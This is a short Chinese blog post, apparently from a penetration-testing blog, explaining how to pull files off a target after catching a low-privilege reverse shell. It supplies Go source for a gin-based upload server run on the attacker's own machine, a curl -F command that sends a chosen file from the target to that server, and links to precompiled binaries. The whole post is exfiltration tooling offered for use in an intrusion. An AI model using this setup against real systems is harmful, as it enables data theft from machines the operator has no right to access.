至少我们曾经在一起过。
来自:一言
说明
现在有一种情况,反弹了一个低权限的shell[aru_17],然后该网站又没有web服务,然后用scp命令也是权限不够(需要验证密码),通过网上查询方法说使用 sshpass 可以进行带密码执行scp命令,但是需要安装这个命令,当前权限并不能安装该命令[aru_28],所以在大表哥的提示下,可以采用curl命令进行文件回传的操作。[aru_21]
条件
1.一台服务器(这个肯定要的[aru_13])
2.目标服务器能够执行curl命令。
方法
1.采用golang编写一个简单的获取文件上传的后端(用golang的话可以避免安装环境等操作,当然你也可以用别的语言来搞一个[aru_62])
点击查看后端源码
main.go文件
package main import ( "flag" "go-upload/runserver" ) func main() { filedir := flag.String("f", "", "保存路径") lport := flag.String("p", "8088", "运行端口") flag.Parse() if *filedir != "" && *lport != "" { runserver.Runserver(*filedir, *lport) } else { flag.Usage() } }
root.go文件
package runserver import ( "fmt" "github.com/gin-gonic/gin" "net/http" ) /* * @Author: A * @Date: 2021/7/6 11:32 */ func Runserver(filedir string, lport string) { r := gin.Default() b := filedir r.POST("/upload", func(c *gin.Context) { file, err := c.FormFile("file") //fmt.Println(file.Filename) s := b + "/" + file.Filename if err != nil { c.String(500, "err") } // c.JSON(200, gin.H{"message": file.Header.Context}) err = c.SaveUploadedFile(file, s) if err != nil { c.String(http.StatusOK, "err") } c.String(http.StatusOK, "ok") }) r.Run(":" + lport) }
2.curl命令参数(根据环境更改)
curl -F "file=@文件路径" http://localhost:8088/upload ##上传成功会回显ok
下载
上方提供了源码,如果懒得编译的可以直接下载。编译了windows和linux下64位的运行程序。
蓝奏云本文作者为TRY,转载请注明。